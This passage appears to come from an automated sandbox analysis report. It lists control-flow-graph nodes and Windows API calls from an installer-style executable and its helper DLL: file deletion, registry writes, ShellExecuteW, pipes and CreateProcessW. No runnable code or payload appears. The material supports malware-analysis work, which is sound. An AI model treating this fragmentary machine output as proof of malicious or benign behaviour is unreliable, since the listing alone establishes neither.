3795->3796 3797 405935 3 API calls 3795->3797 3796->3732 3798 403344 CreateDirectoryW 3797->3798 3902 405b85 3798->3902 3906 405b56 GetFileAttributesW CreateFileW 
3801->3906 3803 402dff 3830 402e0c 3803->3830 3907 405eea lstrcpynW 3803->3907 3805 402e22 3806 405981 2 API calls 3805->3806 3807 402e28 3806->3807 3908 405eea lstrcpynW 3807->3908 3809 402e33 GetFileSize 3810 402f34 3809->3810 3828 402e4a 3809->3828 3811 402d1a 33 API calls 3810->3811 3812 402f3b 3811->3812 3814 402f77 GlobalAlloc 3812->3814 3812->3830 3910 40330f SetFilePointer 3812->3910 3813 4032f9 ReadFile 3813->3828 3818 402f8e 3814->3818 3815 402fcf 3816 402d1a 33 API calls 3815->3816 3816->3830 3822 405b85 2 API calls 3818->3822 3819 402f58 3820 4032f9 ReadFile 3819->3820 3823 402f63 3820->3823 3821 402d1a 33 API calls 3821->3828 3824 402f9f CreateFileW 3822->3824 3823->3814 3823->3830 3825 402fd9 3824->3825 3824->3830 3909 40330f SetFilePointer 3825->3909 3827 402fe7 3829 403062 46 API calls 3827->3829 3828->3810 3828->3813 3828->3815 3828->3821 3828->3830 3829->3830 3830->3739 3832 406254 3 API calls 3831->3832 3833 4038c8 3832->3833 3834 4038e0 3833->3834 3835 4038ce 3833->3835 3836 405db7 3 API calls 3834->3836 3920 405e31 wsprintfW 3835->3920 3837 403910 3836->3837 3839 40392f lstrcatW 3837->3839 3841 405db7 3 API calls 3837->3841 3840 4038de 3839->3840 3911 403b8a 3840->3911 3841->3839 3844 405a3d 18 API calls 3845 403961 3844->3845 3846 4039f5 3845->3846 3848 405db7 3 API calls 3845->3848 3847 405a3d 18 API calls 3846->3847 3849 4039fb 3847->3849 3850 403993 3848->3850 3851 403a0b LoadImageW 3849->3851 3852 405f0c 18 API calls 3849->3852 3850->3846 3855 4039b4 lstrlenW 3850->3855 3858 405962 CharNextW 3850->3858 3853 403ab1 3851->3853 3854 403a32 RegisterClassW 3851->3854 3852->3851 3857 40140b 2 API calls 3853->3857 3856 403a68 SystemParametersInfoW CreateWindowExW 3854->3856 3883 403abb 3854->3883 3859 4039c2 lstrcmpiW 3855->3859 3860 4039e8 3855->3860 3856->3853 3864 403ab7 3857->3864 3862 4039b1 3858->3862 3859->3860 3863 4039d2 GetFileAttributesW 3859->3863 3861 405935 3 API calls 3860->3861 3866 4039ee 3861->3866 3862->3855 3867 4039de 
3863->3867 3865 403b8a 19 API calls 3864->3865 3864->3883 3868 403ac8 3865->3868 3921 405eea lstrcpynW 3866->3921 3867->3860 3870 405981 2 API calls 3867->3870 3871 403ad4 ShowWindow LoadLibraryW 3868->3871 3872 403b57 3868->3872 3870->3860 3873 403af3 LoadLibraryW 3871->3873 3874 403afa GetClassInfoW 3871->3874 3875 405267 5 API calls 3872->3875 3873->3874 3876 403b24 DialogBoxParamW 3874->3876 3877 403b0e GetClassInfoW RegisterClassW 3874->3877 3878 403b5d 3875->3878 3879 40140b 2 API calls 3876->3879 3877->3876 3880 403b61 3878->3880 3881 403b79 3878->3881 3879->3883 3880->3883 3884 40140b 2 API calls 3880->3884 3882 40140b 2 API calls 3881->3882 3882->3883 3883->3742 3884->3883 3885->3729 3886->3774 3887->3746 3889 4037d3 CloseHandle 3888->3889 3890 4037dd 3888->3890 3889->3890 3891 4037f1 3890->3891 3892 4037e7 CloseHandle 3890->3892 3923 40381f 3891->3923 3892->3891 3895 405772 71 API calls 3896 403621 OleUninitialize 3895->3896 3896->3752 3896->3753 3897->3766 3898->3788 3900 4056a0 3899->3900 3901 405694 CloseHandle 3899->3901 3900->3788 3901->3900 3903 405b92 GetTickCount GetTempFileNameW 3902->3903 3904 403358 3903->3904 3905 405bc8 3903->3905 3904->3732 3905->3903 3905->3904 3906->3803 3907->3805 3908->3809 3909->3827 3910->3819 3912 403b9e 3911->3912 3922 405e31 wsprintfW 3912->3922 3914 403c0f 3915 405f0c 18 API calls 3914->3915 3916 403c1b SetWindowTextW 3915->3916 3917 40393f 3916->3917 3918 403c37 3916->3918 3917->3844 3918->3917 3919 405f0c 18 API calls 3918->3919 3919->3918 3920->3840 3921->3846 3922->3914 3924 40382d 3923->3924 3925 403832 FreeLibrary GlobalFree 3924->3925 3926 4037f6 3924->3926 3925->3925 3925->3926 3926->3895 4285 40155b 4286 40296d 4285->4286 4289 405e31 wsprintfW 4286->4289 4288 402972 4289->4288 4297 4023e0 4298 402c44 19 API calls 4297->4298 4299 4023ea 4298->4299 4300 402b3a 18 API calls 4299->4300 4301 4023f3 4300->4301 4302 4023fe RegQueryValueExW 4301->4302 4306 402793 4301->4306 4303 402424 RegCloseKey 4302->4303 4304 
40241e 4302->4304 4303->4306 4304->4303 4308 405e31 wsprintfW 4304->4308 4308->4303 4309 401ce5 GetDlgItem GetClientRect 4310 402b3a 18 API calls 4309->4310 4311 401d17 LoadImageW SendMessageW 4310->4311 4312 401d35 DeleteObject 4311->4312 4313 4029c7 4311->4313 4312->4313 4314 40206a 4315 402b3a 18 API calls 4314->4315 4316 402071 4315->4316 4317 402b3a 18 API calls 4316->4317 4318 40207b 4317->4318 4319 402b3a 18 API calls 4318->4319 4320 402084 4319->4320 4321 402b3a 18 API calls 4320->4321 4322 40208e 4321->4322 4323 402b3a 18 API calls 4322->4323 4324 402098 4323->4324 4325 4020ac CoCreateInstance 4324->4325 4326 402b3a 18 API calls 4324->4326 4329 4020cb 4325->4329 4326->4325 4327 401423 25 API calls 4328 402197 4327->4328 4329->4327 4329->4328 4330 40156b 4331 401584 4330->4331 4332 40157b ShowWindow 4330->4332 4333 401592 ShowWindow 4331->4333 4334 4029c7 4331->4334 4332->4331 4333->4334 4338 4024ee 4339 4024f3 4338->4339 4340 40250c 4338->4340 4343 402b1d 18 API calls 4339->4343 4341 402512 4340->4341 4342 40253e 4340->4342 4344 402b3a 18 API calls 4341->4344 4345 402b3a 18 API calls 4342->4345 4348 4024fa 4343->4348 4346 402519 WideCharToMultiByte lstrlenA 4344->4346 4347 402545 lstrlenW 4345->4347 4346->4348 4347->4348 4349 402567 WriteFile 4348->4349 4350 402793 4348->4350 4349->4350 4351 4018ef 4352 401926 4351->4352 4353 402b3a 18 API calls 4352->4353 4354 40192b 4353->4354 4355 405772 71 API calls 4354->4355 4356 401934 4355->4356 4357 402770 4358 402b3a 18 API calls 4357->4358 4359 402777 FindFirstFileW 4358->4359 4360 40279f 4359->4360 4364 40278a 4359->4364 4361 4027a8 4360->4361 4365 405e31 wsprintfW 4360->4365 4366 405eea lstrcpynW 4361->4366 4365->4361 4366->4364 4367 4014f1 SetForegroundWindow 4368 4029c7 4367->4368 4369 403872 4370 40387d 4369->4370 4371 403881 4370->4371 4372 403884 GlobalAlloc 4370->4372 4372->4371 4373 4018f2 4374 402b3a 18 API calls 4373->4374 4375 4018f9 4374->4375 4376 4056c6 MessageBoxIndirectW 4375->4376 4377 401902 
4376->4377 4378 402573 4379 402b1d 18 API calls 4378->4379 4385 402582 4379->4385 4380 4026a0 4381 4025c8 ReadFile 4381->4380 4381->4385 4382 405bd9 ReadFile 4382->4385 4383 4026a2 4390 405e31 wsprintfW 4383->4390 4384 402608 MultiByteToWideChar 4384->4385 4385->4380 4385->4381 4385->4382 4385->4383 4385->4384 4387 4026b3 4385->4387 4388 40262e SetFilePointer MultiByteToWideChar 4385->4388 4387->4380 4389 4026d4 SetFilePointer 4387->4389 4388->4385 4389->4380 4390->4380 4391 401df3 4392 402b3a 18 API calls 4391->4392 4393 401df9 4392->4393 4394 402b3a 18 API calls 4393->4394 4395 401e02 4394->4395 4396 402b3a 18 API calls 4395->4396 4397 401e0b 4396->4397 4398 402b3a 18 API calls 4397->4398 4399 401e14 4398->4399 4400 401423 25 API calls 4399->4400 4401 401e1b ShellExecuteW 4400->4401 4402 401e4c 4401->4402 4422 4026f9 4423 402700 4422->4423 4429 402972 4422->4429 4424 402b1d 18 API calls 4423->4424 4425 40270b 4424->4425 4426 402712 SetFilePointer 4425->4426 4427 402722 4426->4427 4426->4429 4430 405e31 wsprintfW 4427->4430 4430->4429 4438 40427d lstrlenW 4439 40429c 4438->4439 4440 40429e WideCharToMultiByte 4438->4440 4439->4440 4441 402c7f 4442 402c91 SetTimer 4441->4442 4443 402caa 4441->4443 4442->4443 4444 402cf8 4443->4444 4445 402cfe MulDiv 4443->4445 4446 402cb8 wsprintfW SetWindowTextW SetDlgItemTextW 4445->4446 4446->4444 4448 4014ff 4449 401507 4448->4449 4451 40151a 4448->4451 4450 402b1d 18 API calls 4449->4450 4450->4451 4452 401000 4453 401037 BeginPaint GetClientRect 4452->4453 4454 40100c DefWindowProcW 4452->4454 4456 4010f3 4453->4456 4457 401179 4454->4457 4458 401073 CreateBrushIndirect FillRect DeleteObject 4456->4458 4459 4010fc 4456->4459 4458->4456 4460 401102 CreateFontIndirectW 4459->4460 4461 401167 EndPaint 4459->4461 4460->4461 4462 401112 6 API calls 4460->4462 4461->4457 4462->4461 4463 401a00 4464 402b3a 18 API calls 4463->4464 4465 401a09 ExpandEnvironmentStringsW 4464->4465 4466 401a1d 4465->4466 4468 401a30 4465->4468 4467 
401a22 lstrcmpW 4466->4467 4466->4468 4467->4468 4469 401b01 4470 402b3a 18 API calls 4469->4470 4471 401b08 4470->4471 4472 402b1d 18 API calls 4471->4472 4473 401b11 wsprintfW 4472->4473 4474 4029c7 4473->4474 4475 404583 4476 404593 4475->4476 4477 4045b9 4475->4477 4478 40412f 19 API calls 4476->4478 4479 404196 8 API calls 4477->4479 4480 4045a0 SetDlgItemTextW 4478->4480 4481 4045c5 4479->4481 4480->4477 4482 405108 4483 405118 4482->4483 4484 40512c 4482->4484 4486 40511e 4483->4486 4494 405175 4483->4494 4485 405134 IsWindowVisible 4484->4485 4492 40514b 4484->4492 4487 405141 4485->4487 4485->4494 4489 40417b SendMessageW 4486->4489 4495 404a5e SendMessageW 4487->4495 4488 40517a CallWindowProcW 4491 405128 4488->4491 4489->4491 4492->4488 4500 404ade 4492->4500 4494->4488 4496 404a81 GetMessagePos ScreenToClient SendMessageW 4495->4496 4497 404abd SendMessageW 4495->4497 4498 404ab5 4496->4498 4499 404aba 4496->4499 4497->4498 4498->4492 4499->4497 4509 405eea lstrcpynW 4500->4509 4502 404af1 4510 405e31 wsprintfW 4502->4510 4504 404afb 4505 40140b 2 API calls 4504->4505 4506 404b04 4505->4506 4511 405eea lstrcpynW 4506->4511 4508 404b0b 4508->4494 4509->4502 4510->4504 4511->4508 4512 401f08 4513 402b3a 18 API calls 4512->4513 4514 401f0f GetFileVersionInfoSizeW 4513->4514 4515 401f36 GlobalAlloc 4514->4515 4517 401f8c 4514->4517 4516 401f4a GetFileVersionInfoW 4515->4516 4515->4517 4516->4517 4518 401f59 VerQueryValueW 4516->4518 4518->4517 4519 401f72 4518->4519 4523 405e31 wsprintfW 4519->4523 4521 401f7e 4524 405e31 wsprintfW 4521->4524 4523->4521 4524->4517 4532 404b10 GetDlgItem GetDlgItem 4533 404b62 7 API calls 4532->4533 4542 404d7b 4532->4542 4534 404c05 DeleteObject 4533->4534 4535 404bf8 SendMessageW 4533->4535 4536 404c0e 4534->4536 4535->4534 4537 404c45 4536->4537 4541 405f0c 18 API calls 4536->4541 4539 40412f 19 API calls 4537->4539 4538 404e5f 4540 404f0b 4538->4540 4544 404d6e 4538->4544 4550 404eb8 SendMessageW 4538->4550 4543 404c59 
4539->4543 4545 404f15 SendMessageW 4540->4545 4546 404f1d 4540->4546 4547 404c27 SendMessageW SendMessageW 4541->4547 4542->4538 4548 404a5e 5 API calls 4542->4548 4561 404dec 4542->4561 4549 40412f 19 API calls 4543->4549 4551 404196 8 API calls 4544->4551 4545->4546 4553 404f36 4546->4553 4554 404f2f ImageList_Destroy 4546->4554 4562 404f46 4546->4562 4547->4536 4548->4561 4567 404c67 4549->4567 4550->4544 4556 404ecd SendMessageW 4550->4556 4557 405101 4551->4557 4552 404e51 SendMessageW 4552->4538 4558 404f3f GlobalFree 4553->4558 4553->4562 4554->4553 4555 4050b5 4555->4544 4563 4050c7 ShowWindow GetDlgItem ShowWindow 4555->4563 4560 404ee0 4556->4560 4558->4562 4559 404d3c GetWindowLongW SetWindowLongW 4564 404d55 4559->4564 4571 404ef1 SendMessageW 4560->4571 4561->4538 4561->4552 4562->4555 4575 404ade 4 API calls 4562->4575 4578 404f81 4562->4578 4563->4544 4565 404d73 4564->4565 4566 404d5b ShowWindow 4564->4566 4584 404164 SendMessageW 4565->4584 4583 404164 SendMessageW 4566->4583 4567->4559 4570 404cb7 SendMessageW 4567->4570 4572 404d36 4567->4572 4573 404cf3 SendMessageW 4567->4573 4574 404d04 SendMessageW 4567->4574 4570->4567 4571->4540 4572->4559 4572->4564 4573->4567 4574->4567 4575->4578 4576 40508b InvalidateRect 4576->4555 4577 4050a1 4576->4577 4580 404978 21 API calls 4577->4580 4579 404faf SendMessageW 4578->4579 4582 404fc5 4578->4582 4579->4582 4580->4555 4581 405039 SendMessageW SendMessageW 4581->4582 4582->4576 4582->4581 4583->4544 4584->4542 4585 401491 4586 405194 25 API calls 4585->4586 4587 401498 4586->4587 4588 404912 4589 404922 4588->4589 4590 40493e 4588->4590 4599 4056aa GetDlgItemTextW 4589->4599 4592 404971 4590->4592 4593 404944 SHGetPathFromIDListW 4590->4593 4595 40495b SendMessageW 4593->4595 4596 404954 4593->4596 4594 40492f SendMessageW 4594->4590 4595->4592 4597 40140b 2 API calls 4596->4597 4597->4595 4599->4594 4600 402295 4601 402b3a 18 API calls 4600->4601 4602 4022a4 4601->4602 4603 402b3a 18 API calls 
4602->4603 4604 4022ad 4603->4604 4605 402b3a 18 API calls 4604->4605 4606 4022b7 GetPrivateProfileStringW 4605->4606 3673 401f98 3674 401faa 3673->3674 3683 40205c 3673->3683 3675 402b3a 18 API calls 3674->3675 3676 401fb1 3675->3676 3678 402b3a 18 API calls 3676->3678 3677 401423 25 API calls 3684 402197 3677->3684 3679 401fba 3678->3679 3680 401fd0 LoadLibraryExW 3679->3680 3681 401fc2 GetModuleHandleW 3679->3681 3682 401fe1 3680->3682 3680->3683 3681->3680 3681->3682 3693 4062c0 WideCharToMultiByte 3682->3693 3683->3677 3687 401ff2 3691 402002 3687->3691 3696 401423 3687->3696 3688 40202b 3689 405194 25 API calls 3688->3689 3689->3691 3691->3684 3692 40204e FreeLibrary 3691->3692 3692->3684 3694 4062ea GetProcAddress 3693->3694 3695 401fec 3693->3695 3694->3695 3695->3687 3695->3688 3697 405194 25 API calls 3696->3697 3698 401431 3697->3698 3698->3691 4607 401718 4608 402b3a 18 API calls 4607->4608 4609 40171f SearchPathW 4608->4609 4610 40173a 4609->4610 3927 1000105a 3930 10001112 3927->3930 4009 10001096 GetModuleHandleW GetProcAddress 3930->4009 3933 10001147 GetModuleFileNameW GlobalAlloc 3935 1000118e 3933->3935 3934 1000128c GlobalAlloc 3936 100012aa 3934->3936 3937 10001194 CharPrevW 3935->3937 3938 100011ae 3935->3938 3939 100012c2 FindWindowExW FindWindowExW 3936->3939 3950 100012e3 3936->3950 3937->3935 3937->3938 3941 100011b8 3938->3941 3942 100011ce GetTempFileNameW CopyFileW 3938->3942 3939->3950 4022 10001a8c 3941->4022 3944 10001203 CreateFileW CreateFileMappingW MapViewOfFile 3942->3944 3945 1000126d lstrcatW lstrlenW 3942->3945 3948 10001239 UnmapViewOfFile 3944->3948 3949 1000125f CloseHandle CloseHandle 3944->3949 3945->3936 3947 100011c2 GlobalFree 3951 10001085 3947->3951 3948->3949 3949->3945 3952 10001309 lstrcmpiW 3950->3952 4012 10001a4c 3950->4012 4017 10001862 lstrlenW lstrlenW 3950->4017 3952->3950 3953 10001325 3952->3953 3954 10001356 3953->3954 3955 1000132a 3953->3955 3956 10001401 GetVersionExW 3954->3956 3958 100013d5 
GlobalAlloc 3954->3958 3957 10001a8c 2 API calls 3955->3957 3959 10001437 3956->3959 3960 10001417 InitializeSecurityDescriptor SetSecurityDescriptorDacl 3956->3960 3961 10001334 3957->3961 3965 10001711 lstrcpyW 3958->3965 3966 100013f7 GlobalLock 3958->3966 3963 1000143a CreatePipe 3959->3963 3960->3963 3961->3947 3964 10001348 DeleteFileW 3961->3964 3963->3965 3967 10001458 CreatePipe 3963->3967 3964->3947 3968 10001723 3965->3968 3966->3956 3967->3965 3969 10001473 GetStartupInfoW CreateProcessW 3967->3969 3970 10001731 3968->3970 3971 10001729 3968->3971 3969->3965 3972 100014bf GetTickCount 3969->3972 3975 1000174a 3970->3975 3976 1000173f 3970->3976 3973 10001a8c 2 API calls 3971->3973 3974 100014c8 3972->3974 3973->3970 3974->3968 3979 100014db PeekNamedPipe 3974->3979 3986 100016d9 Sleep 3974->3986 3987 100016ab GetTickCount 3974->3987 3977 10001753 lstrcpyW 3975->3977 3978 10001765 3975->3978 3980 100017f6 3 API calls 3976->3980 3977->3978 3982 10001786 3978->3982 3983 1000176e wsprintfW 3978->3983 3979->3974 3981 100014f5 GetTickCount ReadFile 3979->3981 3984 10001748 3980->3984 4025 100010d3 lstrlenA 3981->4025 3988 10001a8c 2 API calls 3982->3988 3983->3982 3984->3975 3990 100016e1 WaitForSingleObject GetExitCodeProcess PeekNamedPipe 3986->3990 3987->3986 3989 100016ba TerminateProcess lstrcpyW 3987->3989 3991 10001792 6 API calls 3988->3991 3989->3990 3990->3974 3993 100017c1 3991->3993 3992 10001539 lstrlenW 3994 10001569 lstrlenW GlobalSize 3992->3994 3995 1000154a lstrlenW lstrcpynW 3992->3995 3996 100017d3 GlobalFree 3993->3996 3997 100017ca DeleteFileW 3993->3997 3998 10001586 GlobalUnlock GlobalReAlloc 3994->3998 3999 100015b7 lstrcatW 3994->3999 3995->3990 3996->3951 4000 100017e3 GlobalUnlock GlobalFree 3996->4000 3997->3996 3998->3965 4001 100015ad GlobalLock 3998->4001 4007 1000152d 3999->4007 4000->3951 4001->3999 4002 10001862 5 API calls 4002->4007 4003 100015cb GlobalSize 4004 100015ed lstrlenW 4003->4004 4003->4007 4005 1000160c 
lstrcpyW 4004->4005 4004->4007 4005->4007 4006 10001678 CharNextW 4006->4007 4007->3990 4007->3992 4007->4002 4007->4003 4007->4005 4007->4006 4029 100017f6 4007->4029 4010 100010b8 GetCurrentProcess 4009->4010 4011 100010c5 4009->4011 4010->4011 4011->3933 4011->3934 4013 10001a85 4012->4013 4014 10001a56 4012->4014 4013->3950 4014->4013 4015 10001a63 lstrcpyW 4014->4015 4016 10001a76 GlobalFree 4014->4016 4015->4016 4016->4013 4018 10001883 lstrcmpiW 4017->4018 4019 100018bd 4017->4019 4018->4019 4021 100018ac CharNextW lstrlenW 4018->4021 4019->3950 4021->4018 4021->4019 4023 10001a95 GlobalAlloc lstrcpynW 4022->4023 4024 10001acf 4022->4024 4023->4024 4024->3947 4026 10001102 lstrcpyW 4025->4026 4027 100010ee MultiByteToWideChar 4025->4027 4028 1000110c 4026->4028 4027->4028 4028->4007 4030 10001816 SendMessageW SendMessageW SendMessageW 4029->4030 4031 1000185e 4029->4031 4030->4031 4031->4007 4611 40159b 4612 402b3a 18 API calls 4611->4612 4613 4015a2 SetFileAttributesW 4612->4613 4614 4015b4 4613->4614 4615 40149e 4616 4014ac PostQuitMessage 4615->4616 4617 40223e 4615->4617 4616->4617 4618 4021a0 4619 402b3a 18 API calls 4618->4619 4620 4021a6 4619->4620 4621 402b3a 18 API calls 4620->4621 4622 4021af 4621->4622 4623 402b3a 18 API calls 4622->4623 4624 4021b8 4623->4624 4625 40622d 2 API calls 4624->4625 4626 4021c1 4625->4626 4627 4021d2 lstrlenW lstrlenW 4626->4627 4631 4021c5 4626->4631 4629 405194 25 API calls 4627->4629 4628 405194 25 API calls 4632 4021cd 4628->4632 4630 402210 SHFileOperationW 4629->4630 4630->4631 4630->4632 4631->4628 4631->4632 4633 401b22 4634 401b73 4633->4634 4635 401b2f 4633->4635 4636 401b78 4634->4636 4637 401b9d GlobalAlloc 4634->4637 4638 40222b 4635->4638 4643 401b46 4635->4643 4644 401bb8 4636->4644 4654 405eea lstrcpynW 4636->4654 4639 405f0c 18 API calls 4637->4639 4640 405f0c 18 API calls 4638->4640 4639->4644 4642 402238 4640->4642 4647 4056c6 MessageBoxIndirectW 4642->4647 4652 405eea lstrcpynW 4643->4652 4645 
401b8a GlobalFree 4645->4644 4647->4644 4648 401b55 4653 405eea lstrcpynW 4648->4653 4650 401b64 4655 405eea lstrcpynW 4650->4655 4652->4648 4653->4650 4654->4645 4655->4644 4656 4029a2 SendMessageW 4657 4029c7 4656->4657 4658 4029bc InvalidateRect 4656->4658 4658->4657 3452 401924 3453 401926 3452->3453 3454 402b3a 18 API calls 3453->3454 3455 40192b 3454->3455 3458 405772 3455->3458 3498 405a3d 3458->3498 3461 4057b1 3467 4058dc 3461->3467 3512 405eea lstrcpynW 3461->3512 3462 40579a DeleteFileW 3468 401934 3462->3468 3464 4057d7 3465 4057ea 3464->3465 3466 4057dd lstrcatW 3464->3466 3513 405981 lstrlenW 3465->3513 3470 4057f0 3466->3470 3467->3468 3469 40622d 2 API calls 3467->3469 3472 4058f6 3469->3472 3473 405800 lstrcatW 3470->3473 3474 4057f6 3470->3474 3472->3468 3476 4058fa 3472->3476 3475 40580b lstrlenW FindFirstFileW 3473->3475 3474->3473 3474->3475 3477 4058d1 3475->3477 3496 40582d 3475->3496 3478 405935 3 API calls 3476->3478 3477->3467 3479 405900 3478->3479 3481 40572a 5 API calls 3479->3481 3480 4058b4 FindNextFileW 3484 4058ca FindClose 3480->3484 3480->3496 3483 40590c 3481->3483 3485 405910 3483->3485 3486 405926 3483->3486 3484->3477 3485->3468 3489 405194 25 API calls 3485->3489 3488 405194 25 API calls 3486->3488 3488->3468 3491 40591d 3489->3491 3490 405772 64 API calls 3490->3496 3493 405d84 40 API calls 3491->3493 3492 405194 25 API calls 3492->3480 3495 405924 3493->3495 3494 405194 25 API calls 3494->3496 3495->3468 3496->3480 3496->3490 3496->3492 3496->3494 3517 405eea lstrcpynW 3496->3517 3518 40572a 3496->3518 3526 405d84 3496->3526 3531 405eea lstrcpynW 3498->3531 3500 405a4e 3532 4059e0 CharNextW CharNextW 3500->3532 3503 405792 3503->3461 3503->3462 3504 40617e 5 API calls 3510 405a64 3504->3510 3505 405a95 lstrlenW 3506 405aa0 3505->3506 3505->3510 3508 405935 3 API calls 3506->3508 3507 40622d 2 API calls 3507->3510 3509 405aa5 GetFileAttributesW 3508->3509 3509->3503 3510->3503 3510->3505 3510->3507 3511 405981 2 API calls 
3510->3511 3511->3505 3512->3464 3514 40598f 3513->3514 3515 4059a1 3514->3515 3516 405995 CharPrevW 3514->3516 3515->3470 3516->3514 3516->3515 3517->3496 3519 405b31 2 API calls 3518->3519 3520 405736 3519->3520 3521 405757 3520->3521 3522 405745 RemoveDirectoryW 3520->3522 3523 40574d DeleteFileW 3520->3523 3521->3496 3524 405753 3522->3524 3523->3524 3524->3521 3525 405763 SetFileAttributesW 3524->3525 3525->3521 3538 406254 GetModuleHandleA 3526->3538 3530 405dac 3530->3496 3531->3500 3533 4059fd 3532->3533 3535 405a0f 3532->3535 3533->3535 3536 405a0a CharNextW 3533->3536 3534 405a33 3534->3503 3534->3504 3535->3534 3537 405962 CharNextW 3535->3537 3536->3534 3537->3535 3539 406270 LoadLibraryA 3538->3539 3540 40627b GetProcAddress 3538->3540 3539->3540 3541 405d8b 3539->3541 3540->3541 3541->3530 3542 405c08 lstrcpyW 3541->3542 3543 405c31 3542->3543 3544 405c57 GetShortPathNameW 3542->3544 3567 405b56 GetFileAttributesW CreateFileW 3543->3567 3546 405c6c 3544->3546 3547 405d7e 3544->3547 3546->3547 3549 405c74 wsprintfA 3546->3549 3547->3530 3548 405c3b CloseHandle GetShortPathNameW 3548->3547 3550 405c4f 3548->3550 3551 405f0c 18 API calls 3549->3551 3550->3544 3550->3547 3552 405c9c 3551->3552 3568 405b56 GetFileAttributesW CreateFileW 3552->3568 3554 405ca9 3554->3547 3555 405cb8 GetFileSize GlobalAlloc 3554->3555 3556 405d77 CloseHandle 3555->3556 3557 405cda 3555->3557 3556->3547 3558 405bd9 ReadFile 3557->3558 3559 405ce2 3558->3559 3559->3556 3569 405abb lstrlenA 3559->3569 3562 405cf9 lstrcpyA 3565 405d1b 3562->3565 3563 405d0d 3564 405abb 4 API calls 3563->3564 3564->3565 3566 405d52 SetFilePointer WriteFile GlobalFree 3565->3566 3566->3556 3567->3548 3568->3554 3570 405afc lstrlenA 3569->3570 3571 405ad5 lstrcmpiA 3570->3571 3573 405b04 3570->3573 3572 405af3 CharNextA 3571->3572 3571->3573 3572->3570 3573->3562 3573->3563 4666 402224 4667 40222b 4666->4667 4670 40223e 4666->4670 4668 405f0c 18 API calls 4667->4668 4669 402238 4668->4669 4671 
4056c6 MessageBoxIndirectW 4669->4671 4671->4670 4672 10001968 GetCommandLineW lstrcpynW 4673 100019bc 4672->4673 4674 100019dd CharNextW 4673->4674 4675 100019d2 CharNextW 4673->4675 4676 100019e2 CreateProcessW 4674->4676 4675->4673 4678 10001a10 WaitForSingleObject GetExitCodeProcess CloseHandle CloseHandle ExitProcess 4676->4678 4679 10001a41 ExitProcess 4676->4679 4680 402729 4681 402730 4680->4681 4682 4029c7 4680->4682 4683 402736 FindClose 4681->4683 4683->4682 4684 401cab 4685 402b1d 18 API calls 4684->4685 4686 401cb2 4685->4686 4687 402b1d 18 API calls 4686->4687 4688 401cba GetDlgItem 4687->4688 4689 4024e8 4688->4689 4690 4016af 4691 402b3a 18 API calls 4690->4691 4692 4016b5 GetFullPathNameW 4691->4692 4693 4016cf 4692->4693 4699 4016f1 4692->4699 4695 40622d 2 API calls 4693->4695 4693->4699 4694 401706 GetShortPathNameW 4696 4029c7 4694->4696 4697 4016e1 4695->4697 4697->4699 4700 405eea lstrcpynW 4697->4700 4699->4694 4699->4696 4700->4699 3162 402331 3163 402337 3162->3163 3179 402b3a 3163->3179 3166 402b3a 18 API calls 3167 402353 RegCreateKeyExW 3166->3167 3168 40237d 3167->3168 3169 402793 3167->3169 3170 402b3a 18 API calls 3168->3170 3172 402398 3168->3172 3173 40238e lstrlenW 3170->3173 3171 4023a4 3175 4023bf RegSetValueExW 3171->3175 3185 403062 3171->3185 3172->3171 3200 402b1d 3172->3200 3173->3172 3176 4023d5 RegCloseKey 3175->3176 3176->3169 3180 402b46 3179->3180 3203 405f0c 3180->3203 3182 402349 3182->3166 3186 403072 SetFilePointer 3185->3186 3187 40308e 3185->3187 3186->3187 3242 40317d GetTickCount 3187->3242 3192 40317d 43 API calls 3193 4030c5 3192->3193 3194 40313f ReadFile 3193->3194 3197 4030d5 3193->3197 3199 403139 3193->3199 3194->3199 3196 405bd9 ReadFile 3196->3197 3197->3196 3198 403108 WriteFile 3197->3198 3197->3199 3198->3197 3198->3199 3199->3175 3201 405f0c 18 API calls 3200->3201 3202 402b31 3201->3202 3202->3171 3209 405f19 3203->3209 3204 406164 3205 402b67 3204->3205 3237 405eea lstrcpynW 3204->3237 3205->3182 
[Control-flow graph edge list for the preceding function (node addresses and called APIs), rendering data not reproduced]

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        [Control-flow graph for the function at 10001112 (node addresses and called APIs), rendering data not reproduced]
                                                                        APIs
                                                                          • Part of subcall function 10001096: GetModuleHandleW.KERNEL32(kernel32,IsWow64Process,?,0000003F,?,1000113F), ref: 100010A5
                                                                          • Part of subcall function 10001096: GetProcAddress.KERNEL32(00000000), ref: 100010AC
                                                                          • Part of subcall function 10001096: GetCurrentProcess.KERNEL32(?,?,0000003F,?,1000113F), ref: 100010BC
                                                                        • GetModuleFileNameW.KERNEL32(?,00000104), ref: 10001159
                                                                        • GlobalAlloc.KERNEL32(00000040,?), ref: 10001171
                                                                        • CharPrevW.USER32(?,?), ref: 1000119C
                                                                        • GlobalFree.KERNEL32(00000000), ref: 100011C3
                                                                        • GetTempFileNameW.KERNEL32(?,100030A4,00000000,?), ref: 100011E3
                                                                        • CopyFileW.KERNEL32(?,?,00000000), ref: 100011F9
                                                                        • CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000003,00000000,00000000), ref: 10001211
                                                                        • CreateFileMappingW.KERNEL32(00000000,00000000,00000004,00000000,00000000,00000000), ref: 10001221
                                                                        • MapViewOfFile.KERNEL32(00000000,00000002,00000000,00000000,00000000), ref: 1000122F
                                                                        • UnmapViewOfFile.KERNEL32(00000000), ref: 10001259
                                                                        • CloseHandle.KERNEL32(00000000), ref: 10001266
                                                                        • CloseHandle.KERNEL32(?), ref: 1000126B
                                                                        • lstrcatW.KERNEL32(00000000,100030A0), ref: 10001273
                                                                        • lstrlenW.KERNEL32(00000000), ref: 1000127A
                                                                        • GlobalAlloc.KERNEL32(00000040,?), ref: 1000129D
                                                                        • FindWindowExW.USER32(00010460,00000000,#32770,00000000), ref: 100012D1
                                                                        • FindWindowExW.USER32(00000000), ref: 100012D8
                                                                        • lstrcmpiW.KERNEL32(00000000,/OEM,00000000), ref: 1000130F
                                                                        • DeleteFileW.KERNEL32(?,error), ref: 1000134B
                                                                        • GlobalAlloc.KERNEL32(00000042,00002000), ref: 100013E6
                                                                        • GlobalLock.KERNEL32(00000000), ref: 100013F8
                                                                        • GetVersionExW.KERNEL32(00000114), ref: 10001408
                                                                        • InitializeSecurityDescriptor.ADVAPI32(?,00000001), ref: 1000141C
                                                                        • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,00000000,00000000), ref: 10001429
                                                                        • CreatePipe.KERNELBASE(?,?,0000000C,00000000), ref: 1000144A
                                                                        • CreatePipe.KERNELBASE(?,?,0000000C,00000000), ref: 10001465
                                                                        • GetStartupInfoW.KERNEL32(?), ref: 1000147A
